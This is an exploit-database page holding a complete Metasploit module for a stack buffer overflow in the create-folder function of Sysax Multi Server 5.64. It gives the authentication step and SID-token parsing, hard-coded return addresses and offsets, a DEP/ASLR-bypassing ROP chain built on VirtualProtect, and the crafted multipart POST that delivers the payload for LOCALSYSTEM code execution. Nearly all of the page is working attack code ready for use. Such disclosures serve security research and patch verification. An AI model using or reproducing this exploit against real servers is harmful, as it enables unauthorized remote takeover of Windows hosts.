Sysax Multi-Server 5.64 Create Folder Buffer Overflow



EKU-ID: 2521 CVE: OSVDB-ID:
Author: Matt Andreko Published: 2012-07-30 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


require 'msf/core'
require 'base64'

class Metasploit3 < Msf::Exploit::Remote
 Rank = NormalRanking

 include Msf::Exploit::Remote::HttpClient

 def initialize(info = {})
  super(update_info(info,
   'Name'  => 'Sysax Multi Server 5.64 Create Folder BoF',
   'Description' => %q{
     This module exploits a stack buffer overflow in the create folder function
     in Sysax Multi Server 5.64. This issue was fixed in 5.66.

     You must have valid credentials to trigger the vulnerability. Your credentials
     must also have the create folder permission and the HTTP option has to be enabled.
     This module will log into the server, get your a SID token and then proceed to exploit
     the server. Successful exploits result in LOCALSYSTEM access. This exploit works on
     XP SP3, and Server 2003 SP1-SP2.
   },
   'License' => MSF_LICENSE,
   'Author' =>
    [
     'Matt Andreko @mandreko', # discovery & Metasploit module for 5.64
     'Craig Freyman @cd1zz', # original discovery & Metasploit module for 5.50
    ],
   'Version' => '$Revision:$',
   'References' =>
    [
     [ 'URL', 'http://www.mattandreko.com/2012/07/sysax-564-http-remote-buffer-overflow.html' ], # 5.64 update
     [ 'URL', 'http://www.pwnag3.com/2012/01/sysax-multi-server-550-exploit.html' ], # 5.50 post
    ],
   'DefaultOptions' =>
    {
     'EXITFUNC' => 'process',
    },
   'Platform' => 'win',
   'Payload' =>
    {
     'BadChars' => "\x00\x2F",
    },

   'Targets'  =>
    [
     [ 'Windows XP SP3',
      {
       'Rop'  => false,
       'Ret'  => 0x77c35459, # push esp #  ret [sysaxd.exe]
       'Offset' => 701,
      }
     ],
     [ 'Windows 2003 SP1-SP2 DEP & ASLR Bypass',
      {
       'Rop'  => true,
       'Ret'  => 0x77baf605, # pivot
       'Offset' => 701,
       'Nop'  => 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll]
      }
     ],
    ],
   'Privileged' => false,
   'DisclosureDate'=> 'July 29, 2012',
   'DefaultTarget' => 0))

  register_options(
    [
     OptString.new('URI', [false, "URI for Multi Server", '/']),
     Opt::RPORT(80),
     OptString.new('SysaxUSER', [ true, "Username" ]),
     OptString.new('SysaxPASS', [ true, "Password" ])
    ], self.class)
  
 end

 def target_url
  "http://#{rhost}:#{rport}#{datastore['URI']}"
 end

 def create_rop_chain()
  rop_gadgets = []
  # All rop gadgets generated by mona.py
  # Thanks corelanc0d3r for making such a great tool

  if (target == targets[1]) # Windows 2003
   rop_gadgets =
   [
    0x77be3adb, # POP EAX # RETN [msvcrt.dll]
    0x77ba1114, # ptr to &VirtualProtect() [IAT msvcrt.dll]
    0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN [msvcrt.dll]
    0x41414141, # Filler (compensate)
    0x77bb0c86, # XCHG EAX,ESI # RETN [msvcrt.dll]
    0x77bdb896, # POP EBP # RETN [msvcrt.dll]
    0x77be2265, # & push esp #  ret  [msvcrt.dll]
    0x77bdeebf, # POP EAX # RETN [msvcrt.dll]
    0x2cfe0668, # put delta into eax (-> put 0x00000201 into ebx)
    0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
    0x77bdfe37, # ADD EBX,EAX # OR EAX,3000000 # RETN [msvcrt.dll]
    0x77bdf0da, # POP EAX # RETN [msvcrt.dll]
    0x2cfe04a7, # put delta into eax (-> put 0x00000040 into edx)
    0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll]
    0x77bb8285, # XCHG EAX,EDX # RETN [msvcrt.dll]
    0x77bcc2ee, # POP ECX # RETN [msvcrt.dll]
    0x77befbb4, # &Writable location [msvcrt.dll]
    0x77bbf75e, # POP EDI # RETN [msvcrt.dll]
    0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll]
    0x77bdf0da, # POP EAX # RETN [msvcrt.dll]
    0x90909090, # nop
    0x77be6591, # PUSHAD # ADD AL,0EF # RETN [msvcrt.dll]
   ].flatten.pack("V*")
  end

  return rop_gadgets

 end

 def exploit
  
  user = datastore['SysaxUSER']
  pass = datastore['SysaxPASS']
  
  #base64 encode the credentials
  encodedcreds = Base64.encode64(user+"\x0a"+pass)
  creds = "fd="+encodedcreds

  connect

  # Login to get SID value
  print_status "Getting SID from #{target_url}"
  res = send_request_raw({
   'method'=> 'POST',
   'uri' => "#{target_url}/scgi?sid=0&pid=dologin",
   'data'  => creds
  },20)
  
  #parse response for SID token
  sid = res.body.match (/(sid=[A-Z0-9a-z]{40})/)
  print_status "Your " + sid.to_s

  buffer = rand_text(target['Offset'])
  buffer << [target.ret].pack('V')

  if (target['Rop'])
   buffer << [target['Nop']].pack('V')*16
   buffer << create_rop_chain()
  end

  buffer << make_nops(15)
  buffer << payload.encoded #max 1299 bytes
  
  #pwnag3 post data
  post_data = "scgi?"+sid.to_s+"&pid=mk_folder2_name1.htm HTTP/1.1\r\n"
  post_data << "Content-Length: 171\r\n\r\n"
  post_data << "-----------------------------1190753071675116720811342231\r\n"
  post_data << "Content-Disposition: form-data; name=\"e2\"\r\n\r\n"
  post_data << buffer+"\r\n"
  post_data << "-----------------------------1190753071675116720811342231--\r\n\r\n"
  
  referer = "http://"+datastore['RHOST'].to_s+"/scgi?"+sid.to_s+"&pid=mk_folder1_name1.htm"
    
  send_request_raw({
   'uri'     => "/" + post_data,
   'version' => '1.1',
   'method'  => 'POST',
   'referer' => referer
  })

  handler
  disconnect

 end
end